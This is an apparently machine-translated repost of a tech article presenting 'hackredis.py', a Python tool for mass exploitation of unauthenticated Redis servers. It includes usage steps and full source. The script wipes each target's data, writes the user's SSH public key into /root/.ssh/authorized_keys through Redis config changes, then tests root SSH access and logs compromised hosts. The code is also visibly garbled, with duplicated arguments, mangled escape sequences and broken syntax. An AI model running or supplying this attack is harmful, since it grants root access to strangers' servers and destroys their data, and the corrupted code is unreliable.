Shulou(Shulou.com)06/01 Report--

Preface

This article mainly introduces you about the redis unauthorized batch rights related content, to share for your reference and study, the following words do not say much, let's take a look at the detailed introduction.

Installation dependency

Sudo easy_install redis

Use

Redis python hackredis.py usage: hackredis.py [- h] [- l IPLIST] [- p PORT] [- r ID_RSAFILE] [- sp SSH_PORT] For Example: -python hackredis.py-l ip.txt-p 6379-r foo.txt-sp 22optional arguments:-h -- help show this help message and exit-l IPLIST the hosts of target-p PORT the redis default port-r ID_RSAFILE the ssh id_rsa file you generate-sp SSH_PORT the ssh port

First, you need a ssh key:

Ssh-keygen-t rsa cp ~ / .ssh/id_rsa.pub / tmp/foo.txt

Then fill in the ip list into ip.txt, and then you can run. Successful ones will be output to success.txt, those that execute successfully but failed to connect to ssh will be stored in unconnect.txt, and those whose operations fail will be stored in fail.txt.

#! / usr/bin/python#coding:utf-8### @ file hackredis.py # @ date 2015-12-11 # @ author evi1cg # # import redisimport argparseimport textwrapimport sysimport pexpectdef getargs (): parser = argparse.ArgumentParser (prog='hackredis.py' Formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent (''/ For Example:-python hackredis.py-l ip.txt-p 6379-r foo.txt-sp 22 cycles') parser.add_argument ('- l') Dest='iplist', type=str, help='the hosts of target') parser.add_argument ('- sp', dest='ssh_port', type=int,default=22, dest='port', default=6379, type=int, help='the redis default port') parser.add_argument ('- ringing, dest='id_rsafile', type=str, help='the ssh id_rsafile you generate') parser.add_argument ('- sp', dest='ssh_port', type=int,default=22) Help='the ssh port') if (len (sys.argv [1:]) / 2! = 4): sys.argv.append ('- h') return parser.parse_args () def hackredis (host,port): ck = 0 try: print "[*] Attacking ip:%s"% host r = redis.StrictRedis (host=host,port=port,db=0,socket_timeout=2) r.flushall r.set ('crackit',foo) r.config_set (' dir','/root/.ssh/') r.config_set ('dbfilename') 'authorized_keys') r.save () ck = 1 except: print "/ 033 [1 31host 40m [-] / 033 [0m Something wrong with% s "% host write (host,2) ck = 0 if ck = = 1: check (host) else: passdef check (host): print'/ 033 [0m Check connecting... [*] / 033 [0m Check connecting...] ' Try: ssh = pexpect.spawn ('ssh root@%s-p% d'% (host,ssh_port)) I = ssh.expect (' [# / $]', timeout=2) if I = = 0: print "/ 033 [1 [+] / 033 [0m Success!" Write (host,1) else: pass except: print "/ 033 [033 [-] / 033 [0m Failed to connect!" Write (host,3) def write (host,suc): if suc = = 1: filesname = 'success.txt' elif suc = = 2: filesname =' fail.txt' elif suc = = 3: filesname = 'unconnect.txt' else: pass file_object = open (filesname,'a') file_object.write (host+'/n') file_object.close () def main (): global foo,ssh_port paramsargs = getargs () try: hosts = open (paramsargs.iplist "r") except (IOError): print "Error: Check your hostfile path/n" sys.exit (1) port = paramsargs.port ssh_port = paramsargs.ssh_port try: foo ='/ n/n/n'+open (paramsargs.id_rsafile, "r"). Readline () +'/ n except (IOError): print "Error: Check your wordlist path/n" sys.exit (1) ips = [p.replace ('/ n') '') for p in hosts] for ip in ips: hackredis (ip.strip (), port) if _ _ name__ = "_ _ main__": main ()

Summary

The above is the whole content of this article, I hope that the content of this article can bring some help to your study or work, if you have any questions, you can leave a message and exchange, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.